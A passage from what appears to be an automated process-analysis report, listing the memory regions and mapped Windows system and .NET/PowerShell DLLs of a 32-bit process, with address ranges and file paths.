end_va = 0x1c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c20000" filename = "" Region: id = 526 start_va = 0x63250000 end_va = 0x637fafff entry_point = 0x63250000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") Region: id = 527 start_va = 0x6d180000 end_va = 0x6d21afff entry_point = 0x6d180000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll") Region: id = 528 start_va = 0x1ab0000 end_va = 0x1ab0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ab0000" filename = "" Region: id = 529 start_va = 0x1ac0000 end_va = 0x1ac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ac0000" filename = "" Region: id = 530 start_va = 0x1ad0000 end_va = 0x1adffff entry_point = 0x0 region_type = private name = "private_0x0000000001ad0000" filename = "" Region: id = 531 start_va = 0x1b20000 end_va = 0x1b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b20000" filename = "" Region: id = 532 start_va = 0x1b30000 end_va = 0x1b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 533 start_va = 0x1bf0000 end_va = 0x1bfffff entry_point = 0x0 region_type = private name = "private_0x0000000001bf0000" filename = "" Region: id = 534 start_va = 0x1c00000 end_va = 0x1c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 535 start_va = 0x1c10000 end_va = 0x1c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 536 start_va = 0x1c60000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 537 start_va = 0x1ca0000 end_va = 0x1d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 538 start_va = 0x1f30000 end_va = 0x1f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 539 start_va = 0x1f80000 end_va = 0x1f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 540 start_va = 0x1f90000 end_va = 0x3f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 541 start_va = 0x62750000 end_va = 0x63247fff entry_point = 0x62750000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll") Region: id = 542 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 543 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 559 start_va = 0x1d40000 end_va = 0x1d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 560 start_va = 0x3f90000 end_va = 0x4271fff entry_point = 0x3f90000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 561 start_va = 0x61fb0000 end_va = 0x6274bfff entry_point = 0x61fb0000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll") Region: id = 562 start_va = 0x6d0f0000 end_va = 0x6d170fff entry_point = 0x6d0f0000 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4bdde288f147e3b3f2c090ecdf704e6d\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4bdde288f147e3b3f2c090ecdf704e6d\\microsoft.powershell.consolehost.ni.dll") Region: id = 563 start_va = 0x61440000 end_va = 0x61cb9fff entry_point = 0x61440000 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\a8e3a41ecbcc4bb1598ed5719f965110\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\a8e3a41ecbcc4bb1598ed5719f965110\\system.management.automation.ni.dll") Region: id = 564 start_va = 0x74940000 end_va = 0x74948fff entry_point = 0x74941220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 565 start_va = 0x61cc0000 end_va = 0x61fa1fff entry_point = 0x61f4ec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 566 start_va = 0x61cc0000 end_va = 0x61fa1fff entry_point = 0x61f4ec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 567 start_va = 0x1d50000 end_va = 0x1d52fff entry_point = 0x1d50000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\System32\\l_intl.nls" (normalized: "c:\\windows\\system32\\l_intl.nls") Region: id = 568 start_va = 0x1df0000 end_va = 0x1eaffff entry_point = 0x1df0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 569 start_va = 0x773f0000 end_va = 0x773f4fff entry_point = 0x773f1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 570 start_va = 0x1d60000 end_va = 0x1d60fff entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 571 start_va = 0x1d70000 end_va = 0x1d74fff entry_point = 0x1d70000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 572 start_va = 0x1eb0000 end_va = 0x1ef0fff entry_point = 0x1eb0000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 573 start_va = 0x61cc0000 end_va = 0x61fa1fff entry_point = 0x61f4ec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 574 start_va = 0x61cc0000 end_va = 0x61fa1fff entry_point = 0x61f4ec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 575 start_va = 0x1d80000 end_va = 0x1d87fff entry_point = 0x1d80000 region_type = mapped_file name = "microsoft.wsman.runtime.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll") Region: id = 576 start_va = 0x1d90000 end_va = 0x1d90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d90000" filename = "" Region: id = 577 start_va = 0x4280000 end_va = 0x42c2fff entry_point = 0x4280000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 578 start_va = 0x61200000 end_va = 0x61434fff entry_point = 0x61200000 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll") Region: id = 579 start_va = 0x639d0000 end_va = 0x63a6bfff entry_point = 0x639d0000 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll") Region: id = 580 start_va = 0x63a70000 end_va = 0x63af4fff entry_point = 0x63a70000 region_type = mapped_file name = "microsoft.wsman.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\f1865caa683ceb3d12b383a94a35da14\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\f1865caa683ceb3d12b383a94a35da14\\microsoft.wsman.management.ni.dll") Region: id = 581 start_va = 0x67aa0000 end_va = 0x67ae2fff entry_point = 0x67adf03c region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 582 start_va = 0x6d0c0000 end_va = 0x6d0e4fff entry_point = 0x6d0c0000 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll") Region: id = 583 start_va = 0x6d460000 end_va = 0x6d4aafff entry_point = 0x6d460000 region_type = mapped_file name = "microsoft.powershell.commands.diagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\e112e4460a0c9122de8c382126da4a2f\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\e112e4460a0c9122de8c382126da4a2f\\microsoft.powershell.commands.diagnostics.ni.dll") Region: id = 584 start_va = 0x1da0000 end_va = 0x1da0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001da0000" filename = "" Region: id = 585 start_va = 0x60340000 end_va = 0x60347fff entry_point = 0x60340000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll") Region: id = 586 start_va = 0x60f90000 end_va = 0x61052fff entry_point = 0x60f90000 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\583c7b9f52114c026088bdb9f19f64e8\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\583c7b9f52114c026088bdb9f19f64e8\\microsoft.powershell.commands.management.ni.dll") Region: id = 587 start_va = 0x61060000 end_va = 0x611fdfff entry_point = 0x61060000 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\82d7758f278f47dc4191abab1cb11ce3\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\82d7758f278f47dc4191abab1cb11ce3\\microsoft.powershell.commands.utility.ni.dll") Region: id = 588 start_va = 0x6d090000 end_va = 0x6d0bcfff entry_point = 0x6d090000 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\6c5bef3ab74c06a641444eff648c0dde\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\6c5bef3ab74c06a641444eff648c0dde\\microsoft.powershell.security.ni.dll") Region: id = 589 start_va = 0x1da0000 end_va = 0x1daffff entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 590 start_va = 0x42d0000 end_va = 0x4323fff entry_point = 0x42d0000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll") Region: id = 591 start_va = 0x60820000 end_va = 0x60933fff entry_point = 0x60820000 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.DirectorySer#\\45ec12795950a7d54691591c615a9e3c\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.directoryser#\\45ec12795950a7d54691591c615a9e3c\\system.directoryservices.ni.dll") Region: id = 592 start_va = 0x60940000 end_va = 0x60a43fff entry_point = 0x60940000 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\system.management.ni.dll") Region: id = 593 start_va = 0x60a50000 end_va = 0x60f85fff entry_point = 0x60a50000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\system.xml.ni.dll") Region: id = 594 start_va = 0x72040000 end_va = 0x72044fff entry_point = 0x72040000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll") Region: id = 595 start_va = 0x1f00000 end_va = 0x1f10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f00000" filename = "" Region: id = 596 start_va = 0x1f20000 end_va = 0x1f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 597 start_va = 0x1f70000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 598 start_va = 0x4330000 end_va = 0x433ffff entry_point = 0x0 region_type = private name = "private_0x0000000004330000" filename = "" Region: id = 599 start_va = 0x4340000 end_va = 0x434ffff entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 600 start_va = 0x4350000 end_va = 0x435ffff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 601 start_va = 0x4360000 end_va = 0x436ffff entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 602 start_va = 0x4370000 end_va = 0x437ffff entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 603 start_va = 0x4380000 end_va = 0x438ffff entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 604 start_va = 0x75300000 end_va = 0x75307fff entry_point = 0x753010e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 605 start_va = 0x75320000 end_va = 0x7533afff entry_point = 0x753293b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 606 start_va = 0x4390000 end_va = 0x440ffff entry_point = 0x0 region_type = private name = "private_0x0000000004390000" filename = "" Region: id = 607 start_va = 0x4410000 end_va = 0x441ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 608 start_va = 0x4420000 end_va = 0x46f1fff entry_point = 0x4420000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 609 start_va = 0x4700000 end_va = 0x4700fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004700000" filename = "" Region: id = 610 start_va = 0x601c0000 end_va = 0x60810fff entry_point = 0x601c0000 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Data\\1e85062785e286cd9eae9c26d2c61f73\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.data\\1e85062785e286cd9eae9c26d2c61f73\\system.data.ni.dll") Region: id = 611 start_va = 0x64e70000 end_va = 0x65141fff entry_point = 0x6511b43c region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 612 start_va = 0x75460000 end_va = 0x7546bfff entry_point = 0x7546238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 613 start_va = 0x755b0000 end_va = 0x756ccfff entry_point = 0x755b158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 614 start_va = 0x76960000 end_va = 0x76994fff entry_point = 0x76960000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 615 start_va = 0x773e0000 end_va = 0x773e5fff entry_point = 0x773e0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 616 start_va = 0x4710000 end_va = 0x471ffff entry_point = 0x0 region_type = private name = "private_0x0000000004710000" filename = "" Region: id = 617 start_va = 0x4720000 end_va = 0x4720fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004720000" filename = "" Region: id = 618 start_va = 0x60160000 end_va = 0x601bafff entry_point = 0x60160000 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorjit.dll") Region: id = 619 start_va = 0x4730000 end_va = 0x473ffff entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 620 start_va = 0x4740000 end_va = 0x474ffff entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 639 start_va = 0x4750000 end_va = 0x475ffff entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 640 start_va = 0x4760000 end_va = 0x476ffff entry_point = 0x0 region_type = private name = "private_0x0000000004760000" filename = "" Region: id = 641 start_va = 0x4920000 end_va = 0x52affff entry_point = 0x0 region_type = private name = "private_0x0000000004920000" filename = "" Region: id = 642 start_va = 0x75350000 end_va = 0x753aefff entry_point = 0x75352134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 643 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 644 start_va = 0x4770000 end_va = 0x486ffff entry_point = 0x0 region_type = private name = "private_0x0000000004770000" filename = "" Region: id = 645 start_va = 0x753e0000 end_va = 0x753edfff entry_point = 0x753e1235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 646 start_va = 0x4890000 end_va = 0x48cffff entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 647 start_va = 0x53f0000 end_va = 0x542ffff entry_point = 0x0 region_type = private name = "private_0x00000000053f0000" filename = "" Region: id = 648 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 649 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 650 start_va = 0x5fca0000 end_va = 0x5fcc9fff entry_point = 0x5fca0000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll") Region: id = 651 start_va = 0x639a0000 end_va = 0x639c0fff entry_point = 0x639a0000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 652 start_va = 0x71dd0000 end_va = 0x71de1fff entry_point = 0x71dd0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 653 start_va = 0x4870000 end_va = 0x487bfff entry_point = 0x487e356 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 654 start_va = 0x5fba0000 end_va = 0x5fc90fff entry_point = 0x5fba0000 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuration\\bc09ad2d49d8535371845cd7532f9271\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuration\\bc09ad2d49d8535371845cd7532f9271\\system.configuration.ni.dll") Region: id = 655 start_va = 0x7ff50000 end_va = 0x7ff5ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff50000" filename = "" Region: id = 656 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 657 start_va = 0x4880000 end_va = 0x488ffff entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 658 start_va = 0x72be0000 end_va = 0x72bf4fff entry_point = 0x72be0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 659 start_va = 0x72c00000 end_va = 0x72c51fff entry_point = 0x72c00000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 660 start_va = 0x733b0000 end_va = 0x733bcfff entry_point = 0x733b0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 661 start_va = 0x74e30000 end_va = 0x74e6bfff entry_point = 0x74e30000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 662 start_va = 0x52b0000 end_va = 0x534ffff entry_point = 0x0 region_type = private name = "private_0x00000000052b0000" filename = "" Region: id = 663 start_va = 0x749d0000 end_va = 0x749d4fff entry_point = 0x749d0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 664 start_va = 0x75270000 end_va = 0x75275fff entry_point = 0x75270000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 665 start_va = 0x48d0000 end_va = 0x48effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048d0000" filename = "" Region: id = 666 start_va = 0x5490000 end_va = 0x54cffff entry_point = 0x0 region_type = private name = "private_0x0000000005490000" filename = "" Region: id = 667 start_va = 0x719c0000 end_va = 0x71a0efff entry_point = 0x719c1452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 668 start_va = 0x71a10000 end_va = 0x71a67fff entry_point = 0x71a113b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 669 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 670 start_va = 0x740f0000 end_va = 0x7410bfff entry_point = 0x740f0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 671 start_va = 0x740e0000 end_va = 0x740e6fff entry_point = 0x740e0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 672 start_va = 0x73ff0000 end_va = 0x73ffcfff entry_point = 0x73ff0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 673 start_va = 0x73f80000 end_va = 0x73f91fff entry_point = 0x73f80000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 674 start_va = 0x74f70000 end_va = 0x74f77fff entry_point = 0x74f70000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 675 start_va = 0x5500000 end_va = 0x553ffff entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 676 start_va = 0x74d00000 end_va = 0x74d43fff entry_point = 0x74d00000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 677 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 678 start_va = 0x5350000 end_va = 0x53bffff entry_point = 0x0 region_type = private name = "private_0x0000000005350000" filename = "" Region: id = 679 start_va = 0x6f800000 end_va = 0x6f805fff entry_point = 0x6f800000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 680 start_va = 0x73fa0000 end_va = 0x73fd7fff entry_point = 0x73fa0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 681 start_va = 0x5540000 end_va = 0x561ffff entry_point = 0x0 region_type = private name = "private_0x0000000005540000" filename = "" Region: id = 682 start_va = 0x5540000 end_va = 0x557ffff entry_point = 0x0 region_type = private name = "private_0x0000000005540000" filename = "" Region: id = 683 start_va = 0x55e0000 end_va = 0x561ffff entry_point = 0x0 region_type = private name = 